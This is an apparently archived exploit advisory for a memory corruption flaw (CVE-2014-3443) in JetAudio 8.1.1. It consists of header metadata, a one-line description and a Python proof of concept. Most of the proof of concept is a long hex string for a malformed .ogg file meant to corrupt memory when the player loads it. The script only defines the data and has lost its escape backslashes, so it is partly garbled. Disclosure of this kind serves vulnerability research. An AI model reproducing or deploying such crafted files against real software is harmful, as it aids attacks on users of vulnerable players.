Home / exploitsPDF  

Jet Audio 8.1.1 Memory Corruption

Posted on 09 May 2014

# Exploit Title: [JetAudio memory corruption in latest Version 8.1.1 ]
# Date: [2014/05/08]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.jetaudio.com]
# Software Link: [
http://fs31.filehippo.com/8445/45c502d892ec467993e62cfcfdba12f6/JAD8101_BASIC.exe
]
# Version: [Version 8.1.1 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# Found by : Piece Dumb Fuzzer
# CVE : [2014-3443]

details:

Jetaudio latest version V 8.1.1 suffers from an memory corruption
Vulnerability via a malformed .ogg file format when load JetMPAd.ax

Poc:

#!/usr/bin/python
data =
"x4Fx67x67x53x00x02x00x00x00x00x00x00x00x00x55x0Bx00x00x00x00x00x00xC7x72x7Cx6Fx01x1Ex01x76x6Fx72x62x69x73x00x00x00x00x05x99xACx00x00xFDxFFxCFxFCx09xFFx99x0FxF9x0Fx8Fx7FxB9x01x4Fx67x67x53x00x00x00x00x00x00x00x00x00x00x55x0Bx00x00x01x00x00x00x15x5Ax7Ex0Cx11x4AxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx03x76x6Fx72x62x69x73x00x00x00x00x58x69x70x68x2Ex4Fx72x67x20x6Cx69x62x56x6Fx72x62x69x73x20x49x20x32x30x30x32x30x37x31x37x01x00x00x00x19x00x00x00x53x6Fx6Ex79x20x4Fx67x67x20x56x6Fx72x62x69x73x20x31x2Ex30x20x46x69x6Ex61x6Cx01x05x76x6Fx72x62x69x73x29x42x43x56x01x00x08x00x00x80x22x4Cx20xC3x80xD0x90x55x00x00x10x00x00x80xA8x36x14x6BxA9xB1xD6x1Ax63xA1x28x46xD4x62x6Ax31xC6x18x63xE3x2Cx46x90x62x8Bx31xC6x18x63x8Cx31xC6x18x63x8Cx31xC6x18x63x20x34x64x15x00x00x04x00x40x31xEAx15x93x9Ex42xCCx39xE7xDCx18xA6x8Dx51xDAx29xC7x39xE7xDCx18xC5x89x30x58x21xA5xB9xA5x9Ax52xCCxA1x93x9Cx4AxCAx39xE7x1Cx08x0Dx59x05x00x00x02x00x40x48x21x85x14x52x48x21x85x14x52x48x21x85x14x52x4Ax29xA5x94x62x8Ax29xA6x98x62x8Ax29xA6x98x72xCCx31xC7x1Cx83x0Cx32xE8xA4x93x4Ex3AxE9x24xA4x90x42x09xA5xA4x92x52x4AxADxC5x1Ax6BxEFxBDxF7x9Ex7BxEFxBDxF7xDEx7BxEFxBDxF7xDEx7BxEFxBDxF7xDEx7BxCFx39x07x42x43x56x01x00x20x00x00x04x42x06x21x84x10x42x08x21x84x14x52x48x21xA6x98x62xCAx29xA7x80xD0x90x55x00x00x20x00x80x00x00x00x00x4BxB1x14x4DxD1x1CxCFxF1x1CxCFx11x1Dx53x12x25x53x32x25x53x72x2DxD7x32x2Dx53x33x3DxD3x33x45x55x74x55x53x55x65xD7x75x65x53x36x65x53x36x65x55x36x65x53x36x65x53x36x65xD5x95x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x20x34x64x15x00x20x01x00xA0x23x39x92x23x29x8ExE2x38x8ExE3x48x92x04x84x86xACx02x00x64x00x00x04x00x60x28x8AxA3x48x8Ex24x59x92x65x59x96x67x99x9AxE9x99x9Ex69x9AxA6x69x9AxA6x09x84x86xACx02x00x00x01x00x04x00x00x00x00x00xA0x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9Ax66x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x40x68xC8x2Ax00x40x02x00x40xC7x71x1CxC7x71x1CxC7x71x1Cx47x72x24x07x08x0Dx59x05x00xC8x00x00x08x00x40x52x24xC5x72x34x47x73x34xC7x73x3Cx47x74x44x47x94x4Cx49x95x5Cx4BxB6x64x0Dx08x0Dx59x05x00x00x02x00x08x00x00x00x00x00x40x33x2Cx43x53x3Cx47xB3x44x4DxD4x44x51xF4x44x4Fx14x45xD1xF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x80xD0x90x55x00x00x04x00x00x01x9Dx66x98x6Ax80x08x33x92x59x20x34x64x15x00x80x00x00x00x10x81x0Cx53x0Cx08x0Dx59x05x00x00x04x00x00x48x91xE4x24x89x92x93x52x4Ax39x0Cx92xC5x24xA9x94x93x52x4Ax79x14x93x47x35xC9x18x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29x0Cx92xE5x28xA9x94x93x52x4Ax49x8Cx92xC5x28xA9x52x93x52x4Ax79x94x93x27x35xC9xD8x93x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax59x90x92x27x2DxE9x1Ax94x52x4Ax49x8Ex92x06x2DxD9xD4x93x52x4Ax89x52x94x28x39xD9x9Ex94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4AxF9xA0x94x0Fx42x29xA5x94x52x4AxB9xDAx93x6Bx3Dx29xA5x94x52x4Ax19xA3x94xF0x49x29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52xCAx08x42x43x56x01x00x40x00x00x80x71xD6x28x87xA2x93xE8x7Cx71x86x72xA6x29x48x2Ax94x26x74x6Fx92xA3xE4x39xC9xADxB4xDCx9Cx6ExC2x39xA7x9Bx53xCExF9xE4x9Cx73x82xD0x90x55x00x00x20x00x00x84x10x52x48x21x85x14x52x48x21x85x14x52x88x21x86x18x72xC8x29xA7xA0x82x0Ax2AxA9xA4xA2x8Ax2AxAAxACxB2xCCx32xCBx2CxB3xCCx32xCBx2CxB3xCCx32xEBxACxA3x8Ex3Ax0Bx29x84x92x42x0BxADxD5x18x6Bx8CxB1xD5xDEx9CxB4x35x47x29x9Dx94x52x4Ax29xA5x94xCEx39xE7x9Cx20x34x64x15x00x00x02x00x40x20x64x90x41x06x19x65x14x52x88x21xA6x9Cx72xCAx29xA8xA4x92x0Ax08x0Dx59x05x00x00x02x00x08x00x00x00x10x25xD3x31x1DxD1x11x15xD1x11x1DxD1x11x1DxD1x11x1DxCFxF1x1Cx4Fx12x25xD1xF2x2Cx51x33x3Dx53x34x4DxD3x55x65x57x96x75xD9x96x6Dx57x97x75x5Bx97x7DxDBxB7x75xDBxB6x7DxDDxD8x8DxDFx38x8ExE3x38x8ExE3x38x8ExE3x38x8ExE3x38x8Ex63x08x42x43x56x01x00x20x00x00x00x42x08x21x84x14x52x48x21x85x94x62x8Ax31xE7xA0x83x10x42x29x81xD0x90x55x00x00x20x00x80x00x00x00x00x45x71x14xC7x91x1Cx49x92x24x4BxB2x2CxCDxD2x34x4DxD3x34x4FxF4x44xCFxF4x54xCFx15x65xD1x16x6DxCFxF5x6CxD1xF6x5Cx4FxF5x54x4Fx15x55x53x35x5DxD3x55x5DxD7x75x5DxD5x55x65x55x76x6DxDBxB6x6DxDBxB6x6DxDBxB6x6DxDBxB6x6DxDBxB6x65x20x34x64x15x00x20x01x00xA0x23x39x92x22x29x92x22x39x8Ex23x39x92x04x84x86xACx02x00x64x00x00x04x00xA0x28x8AxE2x38x8ExE4x58x92x25x69x92x28x99x96x6AxB9x9AxECxE9x9Ex2ExEAxA2x0Ex84x86xACx02x00x00x01x00x04x00x00x00x00x00x60x88x86x68x88x8Ex68x89x9Ax28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8AxA2x28x8Ax9ExE7x79x9ExE7x79x9ExE7x79x40x68xC8x2Ax00x40x02x00x40x47x72x24xC7x52x2Cx45x52x24xC5x72x2Cx07x08x0Dx59x05x00xC8x00x00x08x00xC0x31x1Cx43x52x24xC7xB2x2Cx4BxD3x34xCFxF3x3Cx4FxF4x44x51x14x45xD3x54x4Dx15x08x0Dx59x05x00x00x02x00x08x00x00x00x00x00x40x51x14xCBxB1x1Cx49xD2x1Cx4Fx12x1Dx51x12x25xD1x12x25x51x13x35x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x45x51x14x81xD0x90x95x00x00x19x00x00x03xB1xF5xD4x72xEEx8DxA0x48x2Ax47xB5xC6xD4x51xE6x24x06x61x1Ax8AxA0x82x18x84x0Cx15x44x88x51x0Ex26x62x0Ax19x26x39x97x0Cx3AxA6x98xD4x18x4Bx2Ax1Dx73x52x6Bx4Bx25x54x48x41x0Cx36xA6x52x29xE5xA8x07x42x43x56x08x00xA1x19x00x0ExC7x01x24xCDx02x24x4Bx03x00x00x00x00x00x00x00x49xD3x00xCDxF3x00xCDxF3x00x00x00x00x00x00x00x40xD2x34xC0xF2x3Cx40xF3x3Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Cx4Dx03x34xD1x03x34xCFx03x00x00x00x00x00x00x00x4DxF4x00x4Fx34x01x4Fx14x01x00x00x00x00x00x00xC0xF2x3CxC0x33x3DxC0x13x4Dx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Cx4Dx03x34xCFx03x34xCFx03x00x00x00x00x00x00x00xCBxF3x00xCFx14x01xCFx33x01x00x00x00x00x00x00x40xF3x44xC0x13x45xC0x33x45x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x01x0Ex00x00x01x16x42xA1x21x2Bx02x80x38x01x00x87x24x41x92x20x49xD0x34x80x64x59xF0x34x68x1Ax4Cx13x20x59x16x34x0Dx9Ax06xD3x04x00x00x00x00x00x00x00x00x00x40xD2x34x68x1Ax34x0DxA2x08x90x34x0Dx9Ax06x4Dx83x28x02x00x00x00x00x00x00x00x00x00x20x79x1Ax34x0Dx9Ax06x51x04x48x9Ax07x4Dx83xA6x41x14x01x00x00x00x00x00x00x00x00x00xD0x4Cx13xA2x08x51x84x69x02x34xD3x84x28x42x14x61x9Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x80x01x07x00x80x00x13xCAx40xA1x21x2Bx02x80x38x01x00x87xE2x58x16x00x00x38x92x63x59x00x00xE0x38x8Ex65x01x00x80x65x59x9Ax06x00x00x96x65x69x1Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x80x01x07x00x80x00x13xCAx40xA1x21x2Bx01x80x28x00x00x87xA2x58x16x70x1CxCBx02x8Ex63x59x40x92x2Cx0Bx60x59x00xCDx03x68x1Ax40x14x01x80x00x00x80x02x07x00x80x00x1Bx34x25x16x07x28x34x64x25x00x10x05x00xE0x50x14xCBxD2x34x51xE4x38x9AxA6x69xA2xC8x71x34x4DxD3x44x91x65x69x9AxE7x99x26x34xCDxF3x4Cx13x9ExE7x79xA6x09xCFxF3x3CxD3x84x69x8AxA2xAAx02x51x54x55x01x00x00x05x0Ex00x00x01x36x68x4Ax2Cx0Ex50x68xC8x4Ax00x20x24x00xC0xE1x38x96xE5x79x9Ex27x8AxA6x68x9AxAAxCAx71x34xCDxF3x44x51x14x4Dx53x55x55x95xE3x58x96xE7x89xA2x28x9AxA6xAAxBAx2ExCBxD2x34xCFx13x45x51x34x4Dx55x75x5Dx68x9AxE7x89xA2x28x9AxA6xAAxBAx2Ex3CxCFxF3x44xD1x14x4Dx55x55x5Dx17x9ExE7x79xA2x68x9AxAAxA9xAAxAEx0Bx51x14x45xD3x34x4Dx55x55x55xD7x05xA2x68x9AxA6xA9xAAxAExEAxBAxC0xF3x44xD1x34x55xD5x75x5Dx17x78x9Ex28x9AxA6xAAxBAxAExEBx02x51x34x4DxD5x54x55xD7x75x5Dx80x69x9AxA6xAAxBAxAExECx02x54x55x55x55xD7x75x65x17xA0xAAxAAxAAxAAxAEx2BxCBx00x55x75x5DxD7x75x5Dx59x06xA0xAAxAExEBxBAxB2x2Cx00x00xE0xC0x01x00x20xC0x08x3AxC9xA8xB2x08x1Bx4DxB8xF0x00x14x1AxB2x22x00x88x02x00x00x8Cx51x4Ax31xA5x0Cx63x12x42x09x21x62x4Cx42x28x21x54x52x4Ax29xA9x94x0Ax42x29xA5x94x50x41x28xA1xA4x10x32x29x29xA5x54x4Ax05xA1x84x50x4AxA8x20x94x52x4Ax29x05x00x80x1Dx38x00x80x1Dx58x08x85x86xACx04x00xF2x00x00x08x63x94x62xCCx39xE7x24x42x4Ax31xE6x9Cx73x12x21xA5x18x73xCEx39xA9x14x63xCEx39xE7x9Cx94x92x31xE7x9Cx73x4Ex4AxC9x98x73xCEx39x27xA5x64xCCx39xE7x9Cx93x52x3AxE7x9Cx73xCEx49x29xA5x74xCEx39xE7xA4x94x52x42xE8x9Cx83x52x4Ax29x9Dx73xCEx39x01x00x40x05x0Ex00x00x01x36x8Ax6Cx4Ex30x12x54x68xC8x4Ax00x20x15x00xC0xE0x38x96xE5x79x9Ex27x8AxA6x69x49x92xA6x79x9Ex28x9AxA6xAAx6Ax92xA4x69x9Ex27x8AxA6xA9xAAx3CxCFxF3x44x51x14x4Dx53x55x79x9ExE7x89xA2x28x9AxA6xAAx72x5Dx51x14x45xD3x34x4Dx55xE5xBAxA2x27x8AxA6xA9xAAxAEx0AxD1x14x45xD3x54x55xD7x85x69x8AxA2x69xAAxAAxEBx42x96x4DxD3x54x5DxD7x75x61xDBxA6xA9xAAxAAxEAxBAx40x75x55xD5x75x5Dx19xB8xAExAAxBAxAEx2Cx0Bx00x00x4Fx70x00x00x2AxB0x61x75x84x93xA2xB1xC0x42x43x56x02x00x19x00x00x84x31x08x29x84x10x52x06x21xA4x10x42x48x29x85x90x00x00x80x01x07x00x80x00x13xCAx40xA1x21x2Bx01x80x54x00x00x80x10x29xA5x94x52x4Ax29x11x63x52x4Ax29xA5x94x52x22xE6xA4x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29x21x84x50x00x20x76x85x03xC0x4Ex84x0DxABx23x9Cx14x8Dx05x16x1AxB2x12x00x08x07x00x00x8Cx41x8Ax31x08x29xB5xD6x62x85x90x62xCEx49x49x29xC6x18x2Bx84x18x73x8Ex4Ax4Ax2DxB6x18x34xE6x1Cx84x94x5Ax6Bx31xD7xA0x31xE7x20xA4xD2x5Ax8Cx35x06xD5x42x28xA5xB5x18x6BxADx35xB8x14x3Ax2AxA9xC5x18x6BxADx41x08x95x52x8Ax31xC6x1Ax73x0Dx42xA8x92x42x6CxB1xE6x9Ax6Bx10xC2xD6xD4x5AxACxB5xE7x9Cx83x10x3AxB7x14x53x8Cx31xF7x1Ax84x10x42xC6x1Ax6BxCDxB9xE7x20x84x10xB6xD6x56x5BxAFxB9x06x21x84xF0x41xD6x9Ax73x0Ex3Ax08x21x84x0FxB2xD6x9Ax83xCEx05x00x98x3Cx38x00x40x25xD8x38xC3x4AxD2x59xE1x68x70xA1x21x2Bx01x80xDCx00x00x04x21xA5x18x73xCEx39x07x21x84x10x42x08x29x42x8Cx31xE6x9Cx73x10x42x08x21x84x52x52x84x18x63xCCx39xE7x20x84x10x42x08x21xA4x8Cx31xE6x9Cx73x10x42x08xA1x94x52x4Ax49x29x65xCCx39xE7x20x84x10x42x29xA5x94x92x52xEAx9Cx73x10x42x08xA1x94x52x4Ax29x25xA5xD4x39xE7x20x84x10x42x09xA5x94x52x4Ax4AxA9x73x0Ex42x08x21x84x52x4Ax29xA5x94x94x52x4Ax9Dx83x10x42x28xA5x94x52x4Ax29x29xA5x94x42x08x21x94x52x4Ax29xA5x94x52x52x4Ax29x85x10x42x28xA5x94x52x4Ax29xA5xA4x94x52x0Ax21x84x52x4Ax29xA5x94x52x4Ax49x29xA5x94x52x08xA1x94x52x4Ax29xA5x94x92x52x4Ax29xA5x52x4Ax29xA5x94x52x4Ax29x25xA5x94x52x4AxA5x84x52x4Ax29xA5x94x52x4Ax4Ax29xA5x94x4Ax29xA5x94x52x4Ax29xA5x94x94x52x4Ax29xA5x54x4Ax29xA5x94x52x4Ax29x29xA5x94x52x4AxA9x94x52x4Ax29xA5x94x52x52x4Ax29xA5x96x52x29xA5x94x52x4Ax29xA5xB4xD4x5Ax4Ax29xA5x52x4Ax29xA5x94x52x4Ax49x29xA5x94x52x4Ax29x95x52x4Ax29xA5x94x52x00x00xD0x81x03x00x40x80x11x95x16x62xA7x19x57x1Ex81x23x0Ax19x26xA0x42x43x56x02x00x64x00x00x08xA2x14x53x4AxADx45x82x2AxC9x9CxC4x5Ex42x25x15x73x90x5Ax8Ax28x93x4Ex5Ax0ExAEx43xD0x20xE6xA4x95x8Ax39x84x94x93x54x3Ax07x95x52x0Cx4Ax2Ax21x75x4Cx29x06x29x96x1Cx42xC6x98x93x9Cx82x4AxA1x63x0Ex00x00x00x41x00x00x81x90x09x04x0AxA0xC0x40x06x00x1Cx20x24x48x01x00x85x05x86x0Ex11x22x40x8Cx02x03xE3xE2xD2x06x00x20x08x91x19x22x11xB1x18x24x26x54x03x45xC5x74x00xB0xB8xC0x90x0Fx00x19x1Ax1Bx69x17x17xD0x65x80x0BxBAxB8xEBx40x08x41x08x42x10x8Bx03x28x20x01x07x27xDCxF0xC4x1Bx9Ex70x83x13x74x8Ax4Ax1Dx08x00x00x00x00xC0x03x00x3Cx00x00x24x1Bx40x44x44x34x73x1Cx1Dx1Ex1Fx20x21x22x23x24x25x4Fx67x67x53x00x01x00x00x00x00x00x00x00x00x55x0Bx00x00x02x00x00x00xAEx93x37x92x01x3Cx26x27x28x02x00x00x00x00x80x07x00x1Fx00x00x49x0Ax10x11x11xCDx1Cx47x87xC7x07x48x88xC8x08x49x89xC9x09x4Ax00x00x20x80x00x00x00x00x00x08x20x00x01x01x01x00x00x00x00x80x00x00x00x00x01x01x4Fx67x67x53x00x00xC0x2Cx00x00x00x00x00x00x55x0Bx00x00x03x00x00x00xABx0Fx1Cx9Bx1Dx53x4ExFFx3FxFFx26xFFx37xFFx63xFFx3FxFFx32xFFx4Ex49x53x57x52xFFx6FxFFx47xFFx40xFFx53xFFxE4x82xB5x62xCExC7xACx76xA3x78x8AxCDx9BxC9x9Bx5Ax21x6AxF0x3Cx5Cx71x10x72x34x7Dx95xF8xF6xF3x23x00x70xB3x75xF3x6ExFFx7Fx46xFExAFxE6x92xDBxFCxFEx8BxA3x17x0BxD6xBFxBEx9Ex8FxBFx7FxC5x2FxDFxB6x88xEFxCEx4DxD4x66xF0xD6x2FxA7xD4x39xB3x15xC8xEAxF6x87xEAx23x00xD4x8Ax05x36x66x92xD4x26xE0xACx98x62x63x3Fx56x35xABx7BxD9xC7x77xD2xCAx35x7DxC1x75xF3x47x00xB0xF2x72xFDx69x59x66xF6x57xD5x4Ex8CxE3xFCxCBx9Bx7Fx6Dx1FxE1x53xFDxEBx3AxBCx7ExEAxD4xEFxCExE1x3Ax42x3AxF7x9Bx52xE8x33x25x89xEAx92x9AxAFx3Fx29x00x5AxCAxB5x41x0AxD9x7Fx06x28x1Bx89x82xA1x5Ax1BxF8xC0x7Fx0Ex98x48xD6xFDx8AxECx97x3DxDFxB3xBCx70x70xF1xCEx1Ex39x03x00x38xF6x71xCCx39x46x50x65x98x9Ax0Ex00x00x00x00xC0x5Dx7Fx85x37xE5xD6xB7x4FxF6xD7x9Bx68x45x00x08x9Dx79xE6x7DxA7xCDxB8x6Bx80xD3x18x82xB3x08x77xF2x6DxDFxF6xF1x3BxD3x1Cx90xB2x8Ex81xECx30xE1x76x57x3FxF2x04x73x70xDDxA1x7ExEEx2Ex62xDCxB7x75xF2xDDx13x16xD5xA7xB3xF7x59xD0x93xDExCEx7Cx70xA3x46xFAx66x10x1Ax51xD9x44xC7x09x6Cx51x45xD7xF3xF1xFBx66x56x33x7BxB7x52xB1xB4x93xC4xD4xB9x26xBBx68x37x99xEBx69x3Ex73x99x39xD9xCEx7AxDBx2FxDFx47x26x4Ax2FxCBx0Dx33x8Ax7Cx08x97x8CxC7x87x51x30x0DxA8xFEx01x24xBCx5Ex57x83xE9x36x47x12x79xC0xD4x74xD6x1FxB5xAFx61x37xDAx87xA9x6AxF4x34x2Fx3ExA4xCCxD1xD2x09x11x4CxB2x1Bx95xD0xEFx50x8Dx09x51xCCx30xEBxA9x7Bx27xABx9Ax1Bx50x36xA3xE9x69x55x67xF7x61x4FxEFx38xEBx9CxE1xF6xF2x9CxACx12xD5x4CxA2x11xD8x0Ax6Dx64xEFx45xD5x47x27xFFx17xE3x26x36xF1xD5xB4xF2x33xB2xDFx0BxC6xAEx89x03x2Bx20x68x19x63xDBx5Dx5BxD6xF7x87x7Ax92x05xE1xD3x7FxB6x00xDExBBxA5x32x47xA6x7Fx8Dx8Ex76x90x28xF4xCBxC5xB2xC5xF9xD7x80x1Bx89xE2xD6x4Dx1Ax38x0Bx28xCCxB9xB5x36xAAxAAx94x4Ex60x00x00x00x00x80xD7x9DxE3xFBx8FxE3xD3xCDx87xF3x41xCDxD2xE7x73x73x7Cx6Bx36x18x93x83x9BxD6xEExCBx14x37x8Fx93xDAx21x16x83xC6x3AxD2xA5x43x2Cx46xC6xFCx6FxC4xF2x79xCEx20x5Dx1Ex45x2FxDBxF5xE1x86x45x27x47x9Dx78xBFxE2x4BxA3xF9x97xDDx62x4Ex92x9Dx93xF3xB3xE5x66x7Ex77x2Ax59x66x0DxBAxFCx78xCFxF5x64x43xDExBDxAExC4xAEx12xC2xEBx24xD3xDExEExDCx77xD6x4Bx15x45xF7x1Cx99xBFxB3x43x2AxAExC7xB8xBDx77x55xBFx94xE5x72xF3x6Bx44x64xCFx63xE3x24xDBx7FxB9x64x51x6Ax47x72x1BxD7x86x5DxDAx4CxB2x9ExFBx21x07xCFx74x55xEFx5CxA2xD0x61xB1x80xD9x67x02xA2x9Ax47x50xEAx49xA6x60x4Ax37xAFxDDx35x55xA3xACx53x44xECxC1xFDx6Ax98xE6xE9x69x21x12x01xA4xCFx14x73xAEx06x37x02xAExB7x6AxEAx3ExB0x52x32xC6x06xD9x7ExA9x99x2FxF8xEBx35x76x63x7Dx8Cx94x17x6Ax7Fx94x7Ex84xD9x23x3DxA6xF8xFBxC9xDBxA4xAFx2Cx49xE1x3BxA1x10x80x02x5Ex8Bx25x69x8DxE0xBFx21x21x0Cx24x0AxDEx5ExA1xCCxC1xFExE7x80x49x39x09xFEx22x20x2Fx97xB5xE3xD8xE7xA8x39x2Ax28x69x3Ax74x00x00x00x00x00x64x56x6Ax55xD5x11xB7xB2xBEx75x36x26xD6x46x9Bx7DxD9xFCx6Fx5ExD4x7ExD2xC6x4Bx72x7AxB0xCEx87x3FxBAxF2x81xBFxACx94x9CxD2xFFx90xDEx2Fx83xFEx3Fx3FxCAxCEx07x37x29x0Bx43x5Bx25xA6xC3x3DxC7xDEx99x4CxEBx69xDBx35xE1x9Ax5CxEFxF9x8Dx9Ex6Ax22x51x4Dx77xB4x8AxDCx61x21x24xDDx55x1ExA2x7Dx0Cx3FxB1xAFx23x96x12x49x65x27xF5x3Cx53xF7xCBx6Cx71xA2xE2x51xFFxE2x55x8DxD1xC3x77x1Ex35xF7x4Bx9BxFFx96x30x97x77x3ExF7xF8xCCx57x34xF3xEEx0CxF3x5Ex61xEDxC3xD3x96xE3xD3xAAx98x92x72xFEx4Fx79xE4xCBx21x73x6CxCEx50xEFx2FxF2x1Cx35xFBx55x65x1ExBFxB9x84x77xE2x24x45x29xF4x47xC0x5Dx49xEFx35xABx87x7ExAEx5FxA6x9Fx62x3Ax1Bx38x9Dx99xCCx0AxD9xDAxF8xFDxADxC3x9Ex4Fx5DxA0x93x64xEAx9CxCCx97xEAx6ExA6x70x0Bx8AxFCxEFxFDxCAx58x38x40x96xBEx5Ax8Cx26x7ExE9xE1x70xA9xECxCFxE8xD4xBExABx48xA6xB0xBEx66xF8x4Bx7Bx79x77x2Fx5FxA6x98x37xE5xF0x0FxBAx2DxAAx02x00x3Ex7AxB5x14x17x21xFEx3Bx23x12xA6xB2x64xDDxD2xABx05x7CxF0xFFx2Cx20x21xFFxF2xD3xE8xBDx66x62x42xDFx32x97xA7xF9x71xA7x80x91xE9x92xD1xC0x19x78xCDxE3x02x5ExF7x0Bx20x40xDBxB6x80xA7x1ExFBxF9x04x00x00x00x00x00xF0x49xF3x2AxF5xC9xD8xFBx8BxDDxD1xB8xD9x69xD3xD5x7ExACxE1x25x5ExA9xDFxC8x09xF7xFEx31x37x45x26x34xA7x3DxAFx23x7Cx13x29xBExAFxA7x08xB9x0DxB8x21x94x74x97x50x47xDBx57xA5xAExA7xD0x11x72x3Bx4Fx2Fx1DxF7x2Fx97xA5x0Bx21x77x81xBCxB7x57xD3xFDx46x43xAFx15xD4x94x46x1DxF7x99x65x66xC6xCDxD3xD7x8Fx70xD8x59xCFx9CxFCxAFx3Ex8Fx7Ax9Cx6CxD5x84x5Dx92xFCx22x7Ex32xE7x9AxFBx5DxBExC6x48xEDx3Fx0Dx1Ax66xAAx4AxCAxFCxE7xA5xCEx17x41xC4x59xD5xD4x1DxD9x66x7Cx76xD5x21x89x64xEBxC2xDBx0Fx88xAExB9xCEx37x1Fx96xE6x19xD7x32xCFxDEx4FxF7xC9x3Dx97xBAx3Cx5Ex3Ax59x34x6Ex56x57x0Fx53x74xA2x9Bx19x5Ax5ExF8x06x8FxEEx08x27x96xE8x6Bx5AxD5x3Dx41x05x9Dx08x01x9AxEAxA9xABxEAxF8x8Ax7Bx38xD8x5DxA8xC7x75x9Bx49x0Fx54xC4xAExDFx3ExF2x79xA3xD9xD8x93xEDx52x81x9Bx32x99x3Ex8AxEFx7Ex24xF4x64x83x11x00x0Ax6AxA2xA2xCFxA8x28xAAx00xAAxC8xA3x82x88x29xAAx8Ax20x28x22x3Fx2Fx72x20x49x92x2CxACxBFx58x7FxD7xADxE1xB7x15x48xC2x00x5Ex8Bx85xC0x05xFEx1Bx26x6Cx24xC1xEFx6Ex01x4Ex19xE6xBFx82x92x06x92xE0xD7x59x92xB8x10xB0xCFx63xCCxA5xAAx2Ax1Cx0Ex1Fx00x00x00x00x00xECxCFxEAxA3x9Dx1Ex85xC4xA8xD9x4ExB9x55x99x58xA9xBExABx76x98x79xF5xA6x1Ax32x19x57xD9xD6x57xCBxEDx53x2Ex3Ex4DxF7x0Ax73xAE